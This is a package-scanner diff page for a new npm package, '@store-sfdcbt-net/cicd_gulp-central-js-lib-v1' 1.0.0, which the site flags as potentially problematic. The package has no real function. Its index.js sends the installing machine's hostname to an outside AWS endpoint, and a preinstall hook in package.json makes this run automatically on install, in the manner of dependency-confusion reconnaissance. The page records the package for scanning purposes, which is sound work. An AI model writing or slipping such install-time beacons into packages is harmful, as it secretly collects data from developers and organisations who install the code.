@store-sfdcbt-net/cicd_gulp-central-js-lib-v1 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @store-sfdcbt-net/cicd_gulp-central-js-lib-v1 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +11 -0
  2. package/package.json +14 -0
package/index.js ADDED
@@ -0,0 +1,11 @@
1
+ const axios = require('axios');
2
+ const os = require('os')
3
+
4
+ const computerName = os.hostname();
5
+
6
+ axios.get('https://1jzlbu5mkl.execute-api.us-east-1.amazonaws.com/prod', {
7
+ params: {
8
+ name: computerName,
9
+ app: "ep"
10
+ }
11
+ });
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "@store-sfdcbt-net/cicd_gulp-central-js-lib-v1",
3
+ "version": "1.0.0",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "preinstall": "node index.js"
7
+ },
8
+ "author": "",
9
+ "license": "ISC",
10
+ "dependencies": {
11
+ "axios": "^1.4.0"
12
+ },
13
+ "description": ""
14
+ }